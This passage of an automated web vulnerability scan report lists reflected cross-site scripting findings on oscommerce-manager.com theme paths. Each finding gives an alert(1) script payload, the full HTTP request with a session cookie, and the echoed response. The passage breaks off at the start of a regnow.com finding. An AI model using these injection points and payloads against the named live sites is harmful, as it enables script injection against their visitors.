The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe33"><script>alert(1)</script>b6c282e0484 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/imagesdfe33"><script>alert(1)</script>b6c282e0484/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/imagesdfe33"><script>alert(1)</script>b6c282e0484/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.155. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee376"><script>alert(1)</script>241027ec1dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-expanded.gifee376"><script>alert(1)</script>241027ec1dc HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gifee376"><script>alert(1)</script>241027ec1dc')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>29d3f4373d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-expanded.gif?3b045"><script>alert(1)</script>29d3f4373d4=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif?3b045"><script>alert(1)</script>29d3f4373d4=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.157. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a5"><script>alert(1)</script>784c4fce844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes9f1a5"><script>alert(1)</script>784c4fce844/oscmanager/images/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes9f1a5"><script>alert(1)</script>784c4fce844/oscmanager/images/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.158. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e03d8"><script>alert(1)</script>bdf9f240bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagere03d8"><script>alert(1)</script>bdf9f240bf5/images/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagere03d8"><script>alert(1)</script>bdf9f240bf5/images/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.159. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef7d"><script>alert(1)</script>c12fe7265ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images7ef7d"><script>alert(1)</script>c12fe7265ca/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images7ef7d"><script>alert(1)</script>c12fe7265ca/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.160. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e58"><script>alert(1)</script>1331439b8c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-leaf.gifc9e58"><script>alert(1)</script>1331439b8c6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gifc9e58"><script>alert(1)</script>1331439b8c6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 600a9"><script>alert(1)</script>2671288c97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-leaf.gif?600a9"><script>alert(1)</script>2671288c97c=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif?600a9"><script>alert(1)</script>2671288c97c=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.162. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8cd"><script>alert(1)</script>62cd40caa8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1f8cd"><script>alert(1)</script>62cd40caa8b/oscmanager/main.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes1f8cd"><script>alert(1)</script>62cd40caa8b/oscmanager/main.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.163. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79fc"><script>alert(1)</script>e125c6ed553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagere79fc"><script>alert(1)</script>e125c6ed553/main.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagere79fc"><script>alert(1)</script>e125c6ed553/main.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.164. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193f0"><script>alert(1)</script>93bc7f90304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/main.css193f0"><script>alert(1)</script>93bc7f90304?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/main.css193f0"><script>alert(1)</script>93bc7f90304?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.165. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca2f"><script>alert(1)</script>b92bcd436dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1ca2f"><script>alert(1)</script>b92bcd436dc/oscmanager/style.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes1ca2f"><script>alert(1)</script>b92bcd436dc/oscmanager/style.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.166. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7585b"><script>alert(1)</script>549d6025e2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager7585b"><script>alert(1)</script>549d6025e2d/style.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager7585b"><script>alert(1)</script>549d6025e2d/style.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.167. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e62"><script>alert(1)</script>0d05b4aca19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/style.css87e62"><script>alert(1)</script>0d05b4aca19?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/style.css87e62"><script>alert(1)</script>0d05b4aca19?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.168. https://www.regnow.com/checkout/cart/edit [bill_addr.country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

